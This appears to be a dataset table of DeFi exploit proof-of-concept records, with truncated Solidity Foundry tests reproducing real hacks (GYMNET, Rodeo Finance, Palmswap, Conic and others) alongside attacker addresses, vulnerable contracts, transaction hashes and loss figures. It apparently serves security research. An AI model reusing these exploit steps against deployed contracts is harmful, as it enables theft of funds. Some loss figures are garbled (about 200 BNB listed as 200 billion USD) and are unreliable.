source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 4.7K USD
// Attacker : https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s
// Attack Contract : https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209
// Vulnerable Contrac... | exploit_poc | IUNMI_db27 | null | IUNMI_db27_exp.sol | null | 8605de1e0fdfc835 | 2026-01-07T10:59:16.509448 | postmortems | ethereum | 20,729,672 | 4.7K USD | 4,700 | https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s | https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209 | https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459 | https://etherscan.io/tx/0x45ce017f5a295f387eafb596b4bcb1192dd1c302ccb9d097d7fa2cdf3008b139 | https://x.com/TenArmorAlert/status/1834503422655263099 | https://x.com/TenArmorAlert/status/1834503422655263099 | true | true | false | low | 4.7K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
deal(address(attC), 2.0000000000001075 ether);
attC.attack{value: 1.07297e-13 ether}(... | true | 4.7K USD | https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s | https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209 | https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459 | https://etherscan.io/tx/0x45ce017f5a295f387eafb596b4bcb1192dd1c302ccb9d097d7fa2cdf3008b139 | https://x.com/TenArmorAlert/status/1834503422655263099 | https://x.com/TenArmorAlert/status/1834503422655263099 | $4.7K | 7.82 | medium | IUNMI_db27 Exploit (None) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Unclear
// Attacker : https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb
// Attack Contract : https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5... | exploit_poc | GYMNET | 2023-07 | GYMNET_exp.sol | flash_loan | beb66d4fa1a8e1f9 | 2026-01-07T10:59:16.509619 | postmortems | bsc | 30,448,986 | Unclear | null | https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb | https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5a0216378e92baf2 | https://bscscan.com/address/0x6b869795937dd2b6f4e03d5a0ffd07a8ad8c095b | https://bscscan.com/tx/0x7fe96c00880b329aa0fcb00f0ef3a0766c54e13965becf9cc5e0df6fbd0deca6 | null | null | true | true | true | medium | Unclear | flash-loan | function testExploit() public {
// Attacker deploys fakeUSDT contract,forcing victim's gym to exchange fakeUSDT to earn
// Start with below amount of fakeUSDT. Crucial for further adding liquidity to PancakeRouter
// Attack contract already had fakeUSDT balance in attack tx
deal(address(... | true | Unclear | https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb | https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5a0216378e92baf2 | https://bscscan.com/address/0x6b869795937dd2b6f4e03d5a0ffd07a8ad8c095b | https://bscscan.com/tx/0x7fe96c00880b329aa0fcb00f0ef3a0766c54e13965becf9cc5e0df6fbd0deca6 | Unknown | 9 | high | GYMNET Exploit (2023-07) | false | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~16k
// Attacker contract address : https://bscscan.com/address/0x21ad028c185ac004474c21ec5666189885f9e518
// Vulnerable contract : https://bscscan.com/address/0x637de69... | exploit_poc | LUSD | 2023-07 | LUSD_exp.sol | flash_loan | 6b09e832cdfce40f | 2026-01-07T10:59:16.509719 | postmortems | bsc | 29,756,866 | ~16k | 16,000 | null | null | https://bscscan.com/address/0x637de69f45f3b66d5389f305088a38109aa0cf7c#code | https://explorer.phalcon.xyz/tx/bsc/0x1eeef7b9a12b13f82ba04a7951c163eb566aa048050d6e9318b725d7bcec6bfa | null | null | true | true | true | medium | ~16k | flash-loan | function testSkim() public {
deal(address(BEP20USDT), address(this), 0);
emit log_named_decimal_uint(
"Attacker BEP20USDT balance before attack", BEP20USDT.balanceOf(address(this)), BEP20USDT.decimals()
);
takeFlashloan(DPPOracle1);
emit log_named_decimal_uint(
... | true | ~16k | $16.0K | 9.31 | high | LUSD Exploit (2023-07) | true | true | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~472 Ether (~$888K)
// Attacker : https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328
// Attack Contract : https://arbiscan.io/address/0xe9544ee39821f... | exploit_poc | RodeoFinance | 2023-07 | RodeoFinance_exp.sol | flash_loan | 94559dbb1edcd429 | 2026-01-07T10:59:16.509803 | postmortems | arbitrum | 110,043,452 | ~472 Ether (~$888K) | 472 | https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328 | https://arbiscan.io/address/0xe9544ee39821f72c4fc87a5588522230e340aa54 | https://arbiscan.io/address/0xf3721d8a2c051643e06bf2646762522fa66100da | https://arbiscan.io/tx/0xb1be5dee3852c818af742f5dd44def285b497ffc5c2eda0d893af542a09fb25a | null | null | true | true | true | low | ~472 Ether (~$888K) | flash-loan | function testExploit() public {
// Begin with the specific amount of unsETH (info about amount taken from the above attack tx)
// the attackers manipulated the price of TWAP Oracle through multiple transactions
// such as https://arbiscan.io/tx/0x5f16637460021994d40430dadc020fffdb96937cfaf2b8cb6... | true | ~472 Ether (~$888K) | https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328 | https://arbiscan.io/address/0xe9544ee39821f72c4fc87a5588522230e340aa54 | https://arbiscan.io/address/0xf3721d8a2c051643e06bf2646762522fa66100da | https://arbiscan.io/tx/0xb1be5dee3852c818af742f5dd44def285b497ffc5c2eda0d893af542a09fb25a | $472 | 10 | high | RodeoFinance Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$119K
// Attacker : https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113
// Attacker Contract : https://bscscan.com/address/0x6191203510c2a6442faecdb6... | exploit_poc | Utopia | 2023-07 | Utopia_exp.sol | null | c2aec66884e956a7 | 2026-01-07T10:59:16.509879 | postmortems | bsc | 30,119,396 | ~$119K | 119,000 | https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113 | null | https://bscscan.com/address/0xb1da08c472567eb0ec19639b1822f578d39f3333 | https://bscscan.com/tx/0xeb4eb487f58d39c05778fed30cd001b986d3c52279e44f46b2de2773e7ee1d5e | null | null | true | true | false | high | ~$119K | unknown | function testExploit() public {
deal(address(WBNB), address(this), 0.01 ether);
WBNB.approve(address(Router), type(uint256).max);
Utopia.approve(address(Router), type(uint256).max);
emit log_named_decimal_uint(
"Attacker WBNB balance before exploit", WBNB.balanceOf(address(th... | true | ~$119K | https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113 | https://bscscan.com/address/0xb1da08c472567eb0ec19639b1822f578d39f3333 | https://bscscan.com/tx/0xeb4eb487f58d39c05778fed30cd001b986d3c52279e44f46b2de2773e7ee1d5e | $119.0K | 7.74 | medium | Utopia Exploit (2023-07) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~200BNB
// Attacker : 0x00703face6621bd207d3b4ac9867058190c0bb09
// Attack Contract : 0xcdf0eb202cfd1f502f3fdca9006a4b5729aadebc
// Vulnerable Contract : 0xed56784bc8f2c... | exploit_poc | Bamboo | 2023-07 | Bamboo_exp.sol | flash_loan | 610a4f51346aae04 | 2026-01-07T10:59:16.509930 | postmortems | bsc | 29,668,034 | ~200BNB | 200,000,000,000 | null | null | null | https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10 | https://twitter.com/Phalcon_xyz/status/1676220090142916611 | null | true | true | true | critical | ~200BNB | flash-loan | function testExploit() public {
// get a flash loan (lets mock it out)
deal(address(wbnb), address(this), 4000 ether);
console.log("start balance after flashloan", toEth(wbnb.balanceOf(address(this))));
uint256 bambooBalance = bamboo.balanceOf(address(wbnbBambooPair));
address... | true | ~200BNB | https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10 | https://twitter.com/Phalcon_xyz/status/1676220090142916611 | $200000.00M | 7.55 | medium | Bamboo Exploit (2023-07) | true | false | true | true | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~80K USD$
// Attacker : https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94
// Attack Contract : https://bscscan.com/address/0x5336a15f27b74f62cc18238... | exploit_poc | WGPT | 2023-07 | WGPT_exp.sol | flash_loan | 6592172eefcd4ebe | 2026-01-07T10:59:16.509982 | postmortems | bsc | 29,891,709 | ~80K USD$ | 80,000 | https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94 | https://bscscan.com/address/0x5336a15f27b74f62cc182388c005df419ffb58b8 | https://bscscan.com/address/0x1f415255f7e2a8546559a553e962de7bc60d7942 | https://bscscan.com/tx/0x258e53526e5a48feb1e4beadbf7ee53e07e816681ea297332533371032446bfd | null | null | true | true | true | medium | ~80K USD$ | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint("Attacker BUSDT balance before", BUSDT.balanceOf(address(this)), BUSDT.decimals());
ExpToken.approve(address(Router), type(uint256).max);
BUSDT.approve(address(Router), type(uint256).max);... | true | ~80K USD$ | https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94 | https://bscscan.com/address/0x5336a15f27b74f62cc182388c005df419ffb58b8 | https://bscscan.com/address/0x1f415255f7e2a8546559a553e962de7bc60d7942 | https://bscscan.com/tx/0x258e53526e5a48feb1e4beadbf7ee53e07e816681ea297332533371032446bfd | $80.0K | 10 | high | WGPT Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$900K
// Attacker : https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
// Attack Contract : https://bscscan.com/address/0x55252a6d50bfad0e5f10095412... | exploit_poc | Palmswap | 2023-07 | Palmswap_exp.sol | flash_loan | c57eea31f152889d | 2026-01-07T10:59:16.510051 | postmortems | bsc | 30,248,637 | ~$900K | 900,000 | https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 | https://bscscan.com/address/0x55252a6d50bfad0e5f1009541284c783686f7f25 | https://bscscan.com/address/0xd990094a611c3de34664dd3664ebf979a1230fc1 | https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9 | null | null | true | true | true | high | ~$900K | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
BUSDT.approve(plpManager, type(uint256).max);
BUSDT.approve(address(RadiantLP), type(uint256).max);
PLP.approve(fPLP, type(uint256).max);
emit log_named_decimal_uint(
"Attacker balance of BUSDT b... | true | ~$900K | https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 | https://bscscan.com/address/0x55252a6d50bfad0e5f1009541284c783686f7f25 | https://bscscan.com/address/0xd990094a611c3de34664dd3664ebf979a1230fc1 | https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9 | $900.0K | 9.07 | high | Palmswap Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~7K USD$
// Attacker : https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a
// Attack Contract : https://bscscan.com/address/0x45aa258ad08eeeb841c1c02e... | exploit_poc | ApeDAO | 2023-07 | ApeDAO_exp.sol | flash_loan | 7d850e97dd75e65e | 2026-01-07T10:59:16.510104 | postmortems | bsc | 30,072,293 | ~7K USD$ | 7,000 | https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a | https://bscscan.com/address/0x45aa258ad08eeeb841c1c02eca7658f9dd4779c0 | https://bscscan.com/address/0xb47955b5b7eaf49c815ebc389850eb576c460092 | https://bscscan.com/tx/0x8d35dfd9968ce61fb969ffe8dcc29eeeae864e466d2cb0b7d26ce63644691994 | null | null | true | true | true | low | ~7K USD$ | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint(
"BUSDT balance of attacker before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), ne... | true | ~7K USD$ | https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a | https://bscscan.com/address/0x45aa258ad08eeeb841c1c02eca7658f9dd4779c0 | https://bscscan.com/address/0xb47955b5b7eaf49c815ebc389850eb576c460092 | https://bscscan.com/tx/0x8d35dfd9968ce61fb969ffe8dcc29eeeae864e466d2cb0b7d26ce63644691994 | $7.0K | 9.36 | high | ApeDAO Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~31K USD$
// Attacker : https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132
// Attack Contract : https://bscscan.com/address/0x18703a4fd7b3688607abf25... | exploit_poc | NewFi | 2023-07 | NewFi_exp.sol | null | ec8fa568b960bcc6 | 2026-01-07T10:59:16.510166 | postmortems | bsc | 30,043,573 | ~31K USD$ | 31,000 | https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132 | https://bscscan.com/address/0x18703a4fd7b3688607abf25424b6ab304def2512 | https://bscscan.com/address/0xb8dc09eec82cab2e86c7edc8dd5882dd92d22411 | https://bscscan.com/tx/0x557628123d137ea49564e4dccff5f5d1e508607e96dd20fe99a670519b679cb5 | null | https://twitter.com/Phalcon_xyz/status/1680961588323557376 | true | true | false | medium | ~31K USD$ | unknown | function testExploit() public {
USDT.approve(address(Router), type(uint256).max);
BUSD.approve(address(Router), type(uint256).max);
BUSD.approve(address(StakedV3), type(uint256).max);
BUSD.approve(address(StakedV3), type(uint256).max);
Pair1.flash(address(this), 0, BUSD.balanceOf... | true | ~31K USD$ | https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132 | https://bscscan.com/address/0x18703a4fd7b3688607abf25424b6ab304def2512 | https://bscscan.com/address/0xb8dc09eec82cab2e86c7edc8dd5882dd92d22411 | https://bscscan.com/tx/0x557628123d137ea49564e4dccff5f5d1e508607e96dd20fe99a670519b679cb5 | https://twitter.com/Phalcon_xyz/status/1680961588323557376 | $31.0K | 8.21 | high | NewFi Exploit (2023-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~452K USD$
// Attacker : https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02
// Attack Contract : https://polygonscan.com/address/0xdfcdb5a86b167b... | exploit_poc | Libertify | 2023-07 | Libertify_exp.sol | flash_loan | 99ea34252bb6530b | 2026-01-07T10:59:16.510217 | postmortems | polygon | 44,941,584 | ~452K USD$ | 452,000 | https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02 | https://polygonscan.com/address/0xdfcdb5a86b167b3a418f3909d6f7a2f2873f2969 | https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b | https://polygonscan.com/tx/0x7320accea0ef1d7abca8100c82223533b624c82d3e8d445954731495d4388483 | null | https://twitter.com/peckshield/status/1678688731908411393 | true | true | true | high | ~452K USD$ | flash-loan | false | ~452K USD$ | https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02 | https://polygonscan.com/address/0xdfcdb5a86b167b3a418f3909d6f7a2f2873f2969 | https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b | https://polygonscan.com/tx/0x7320accea0ef1d7abca8100c82223533b624c82d3e8d445954731495d4388483 | https://twitter.com/peckshield/status/1678688731908411393 | $452.0K | 8 | high | Libertify Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~180K USD$
// Attacker : https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66
// Attack Contract : https://etherscan.io/address/0x1ae3929e1975043e5443... | exploit_poc | CIVNFT | 2023-07 | CIVNFT_exp.sol | access_control | f3690bbe87db29b1 | 2026-01-07T10:59:16.510285 | postmortems | ethereum | 17,649,875 | ~180K USD$ | 180,000 | https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66 | https://etherscan.io/address/0x1ae3929e1975043e5443868be91cac12d8cc25ec | https://etherscan.io/address/0xf169bd68ed72b2fdc3c9234833197171aa000580 | https://etherscan.io/tx/0x93a033917fcdbd5fe8ae24e9fe22f002949cba2f621a1c43a54f6519479caceb | null | null | true | true | true | high | ~180K USD$ | access-control | function testExploit() public {
emit log_named_decimal_uint("Attacker CIV balance before exploit", CIV.balanceOf(address(this)), CIV.decimals());
// Calling vulnerable function in CIVNFT contract
call0x7ca06d68();
emit log_named_decimal_uint("Attacker CIV balance after exploit", CIV.bala... | true | ~180K USD$ | https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66 | https://etherscan.io/address/0x1ae3929e1975043e5443868be91cac12d8cc25ec | https://etherscan.io/address/0xf169bd68ed72b2fdc3c9234833197171aa000580 | https://etherscan.io/tx/0x93a033917fcdbd5fe8ae24e9fe22f002949cba2f621a1c43a54f6519479caceb | $180.0K | 9.18 | high | CIVNFT Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~150K USD$
// Attacker : https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3
// Attack Contract : https://bscscan.com/address/0x9cffc95e742d22c1446a3d... | exploit_poc | Carson | 2023-07 | Carson_exp.sol | flash_loan | fdcc073149a72ae5 | 2026-01-07T10:59:16.510336 | postmortems | bsc | 30,306,324 | ~150K USD$ | 150,000 | https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3 | https://bscscan.com/address/0x9cffc95e742d22c1446a3d22e656bb23835a38ac | null | https://bscscan.com/tx/0x37d921a6bb0ecdd8f1ec918d795f9c354727a3ff6b0dba98a512fceb9662a3ac | null | null | true | true | true | high | ~150K USD$ | flash-loan | function testExploit() public {
deal(address(BUSDT), address(this), 0);
emit log_named_decimal_uint(
"Attacker balance of BUSDT before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals()
);
DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), n... | true | ~150K USD$ | https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3 | https://bscscan.com/address/0x9cffc95e742d22c1446a3d22e656bb23835a38ac | https://bscscan.com/tx/0x37d921a6bb0ecdd8f1ec918d795f9c354727a3ff6b0dba98a512fceb9662a3ac | $150.0K | 8.22 | high | Carson Exploit (2023-07) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$505K
// Attacker : https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb
// Attacker Contract : https://bscscan.com/address/0xd138b9a58d3e5f4be1cd5ec9... | exploit_poc | BNO | 2023-07 | BNO_exp.sol | null | 6a28a8ad3c7d2ee2 | 2026-01-07T10:59:16.510392 | postmortems | bsc | 30,056,629 | ~$505K | 505,000 | https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb | null | https://bscscan.com/address/0xdca503449899d5649d32175a255a8835a03e4006 | https://bscscan.com/tx/0x33fed54de490797b99b2fc7a159e43af57e9e6bdefc2c2d052dc814cfe0096b9 | null | null | true | true | false | high | ~$505K | unknown | function testExploit() public {
cheats.startPrank(attackerContract);
NFT.transferFrom(attacker, address(this), 13);
NFT.transferFrom(attacker, address(this), 14);
cheats.stopPrank();
emit log_named_decimal_uint(
"Attacker balance of BNO before exploit", BNO.balanceOf... | true | ~$505K | https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb | https://bscscan.com/address/0xdca503449899d5649d32175a255a8835a03e4006 | https://bscscan.com/tx/0x33fed54de490797b99b2fc7a159e43af57e9e6bdefc2c2d052dc814cfe0096b9 | $505.0K | 7.78 | medium | BNO Exploit (2023-07) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~46K USD$
// Attacker : https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300
// Attack Contract : https://etherscan.io/address/0x3f99d5cd830203a3027eb... | exploit_poc | Bao | 2023-07 | Bao_exp.sol | flash_loan | f7ae6f8a8d8e8afe | 2026-01-07T10:59:16.510441 | postmortems | ethereum | 17,620,870 | ~46K USD$ | 46,000 | https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300 | https://etherscan.io/address/0x3f99d5cd830203a3027eb0ed6548db7f81c3408f | https://etherscan.io/address/0xb0f8fe96b4880adbdede0ddf446bd1e7ef122c4e | https://etherscan.io/tx/0xdd7dd68cd879d07cfc2cb74606baa2a5bf18df0e3bda9f6b43f904f4f7bbdfc1 | null | https://twitter.com/PeckShieldAlert/status/1676224397248454657 | true | true | true | medium | ~46K USD$ | flash-loan | false | ~46K USD$ | https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300 | https://etherscan.io/address/0x3f99d5cd830203a3027eb0ed6548db7f81c3408f | https://etherscan.io/address/0xb0f8fe96b4880adbdede0ddf446bd1e7ef122c4e | https://etherscan.io/tx/0xdd7dd68cd879d07cfc2cb74606baa2a5bf18df0e3bda9f6b43f904f4f7bbdfc1 | https://twitter.com/PeckShieldAlert/status/1676224397248454657 | $46.0K | 8 | high | Bao Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~20999 USD
// TX : https://app.blocksec.com/explorer/tx/eth/0xfc872bf5ca8f04b18b82041ec563e4abf2e31e1fc27d1ea5dee39bc8a79d2d06
// Attacker : https://etherscan.io/addres... | exploit_poc | USDTStakingContract28 | 2023-07 | USDTStakingContract28_exp.sol | null | cee37b2283e5c9c2 | 2026-01-07T10:59:16.510506 | postmortems | ethereum | 17,696,562 | ~20999 USD | 20,999 | https://etherscan.io/address/0x000000915f1b10b0ef5c4efe696ab65f13f36e74 | https://etherscan.io/address/0xb754ebdba9b009113b4cf445a7cb0fc9227648ad | null | null | null | null | true | false | false | medium | ~20999 USD | unknown | function testExploit() public {
emit log_named_decimal_uint("[Begin] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 6);
money = new Money();
money.attack();
emit log_named_decimal_uint(
"[End] Attacker USDT balance after exploit", USDT.balanceOf(address... | true | https://etherscan.io/address/0x000000915f1b10b0ef5c4efe696ab65f13f36e74 | https://etherscan.io/address/0xb754ebdba9b009113b4cf445a7cb0fc9227648ad | $21.0K | 5.21 | medium | USDTStakingContract28 Exploit (2023-07) | true | false | false | false | |||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~9k US$
// Attacker : https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf
// Attack Contract : https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fc... | exploit_poc | MintoFinance | 2023-07 | MintoFinance_exp.sol | null | db7c99bae2f44ab3 | 2026-01-07T10:59:16.510556 | postmortems | bsc | 30,214,253 | ~9k US$ | 9,000 | https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf | https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fcabc7b1cd | https://bscscan.com/address/0xdbf1c56b2ad121fe705f9b68225378aa6784f3e5 | https://explorer.phalcon.xyz/tx/bsc/0x53be95dc8ffbc80060215133f76f48df35deef3cd7e1803e24b1e2f8aa53440b | null | https://twitter.com/bbbb/status/1683180340548890631?s=20 | true | true | false | low | ~9k US$ | unknown | false | ~9k US$ | https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf | https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fcabc7b1cd | https://bscscan.com/address/0xdbf1c56b2ad121fe705f9b68225378aa6784f3e5 | https://explorer.phalcon.xyz/tx/bsc/0x53be95dc8ffbc80060215133f76f48df35deef3cd7e1803e24b1e2f8aa53440b | https://twitter.com/bbbb/status/1683180340548890631?s=20 | $9.0K | 6.01 | medium | MintoFinance Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~934K USD$
// Attacker : https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80
// Attack Contract : https://etherscan.io/address/0x486cb3f61771ed548369... | exploit_poc | Conic02 | 2023-07 | Conic02_exp.sol | flash_loan | cabff016f1959a77 | 2026-01-07T10:59:16.510608 | postmortems | ethereum | 17,743,470 | ~934K USD$ | 934,000 | https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80 | https://etherscan.io/address/0x486cb3f61771ed5483691dd65f4186da9e37c68e | https://etherscan.io/address/0x369cbc5c6f139b1132d3b91b87241b37fc5b971f | https://etherscan.io/tx/0x37acd17a80a5f95728459bfea85cb2e1f64b4c75cf4a4c8dcb61964e26860882 | https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d | https://twitter.com/spreekaway/status/1682467603518726144 | true | true | true | high | ~934K USD$ | flash-loan | false | ~934K USD$ | https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80 | https://etherscan.io/address/0x486cb3f61771ed5483691dd65f4186da9e37c68e | https://etherscan.io/address/0x369cbc5c6f139b1132d3b91b87241b37fc5b971f | https://etherscan.io/tx/0x37acd17a80a5f95728459bfea85cb2e1f64b4c75cf4a4c8dcb61964e26860882 | https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d | https://twitter.com/spreekaway/status/1682467603518726144 | $934.0K | 8 | high | Conic02 Exploit (2023-07) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
